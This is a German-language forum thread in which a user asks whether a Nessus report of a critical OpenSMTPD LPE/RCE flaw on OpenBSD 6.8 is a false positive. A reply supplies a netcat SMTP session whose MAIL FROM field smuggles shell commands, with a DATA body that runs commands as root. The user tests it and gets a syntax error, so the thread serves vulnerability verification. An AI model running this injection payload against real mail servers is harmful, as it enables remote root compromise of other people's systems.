OpenBSD 6.8 - OpenSMTPD Critical LPE / RCE Vulnerability Remote mit Nessus Scanner

Hallo Community!

Habe mal eine Frage zum Nessus Scanner.
Sind die Ergebnisse vom Scanner eigentlich vertrauenswürdig? Weil hab mal die freie Variante vom Scanner installiert und auf meinem Server losgelassen.
Allerdings zeigt er eine kritische Lücke für den SMTP Dienst an. Dieser sollte aber schon bei einem Patch in OpenBSD 6.6 gschlossen worden sein.

Weiß nicht, hab jetzt mal OpenSMTPD mit den Sourcen neu kompiliert und installiert. Das Ergebnis ist allerdings gleich geblieben:
obsd68_smtpd.png

Hat jemand eine Idee was hier sein kein? Server eventuell schon korrumpiert?
 
Lässt sich doch recht schnell überprüfen:
Code:
$ nc 192.168.56.143 25

   HELO professor.falken
   MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
   RCPT TO:<root@example.org>
   DATA
   #0
   #1
   ...
   #d
   for i in W O P R; do
        echo -n "($i) " && id || break
   done > /root/x."`id -u`"."$$"
   .
   QUIT

Vielen lieben Dank!
Hätte ich aber selber auch nachlesen können. Schande über mich...das Jahr fängt ja gut an. :sneaky:

Hab das jetzt mal probiert.

Schaut so aus, als ob es sich tatsächlich um ein False-Positive handelt...

Weil wenn ich nach der Eingabe von HELO das jeweilige für MAIL FROM eingebe, erscheint eine Fehlermeldung:
Code:
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
553 5.1.0 Sender address syntax error

Soweit ich ich das richtig verstanden, würde aber bei einer noch bestehenden Sicherheitslücke OpenSMTPD mit Okay antworten...
Code:
250 2.0.0 Ok

Was er aber in meinem Fall nicht tut.
 
Zurück
Oben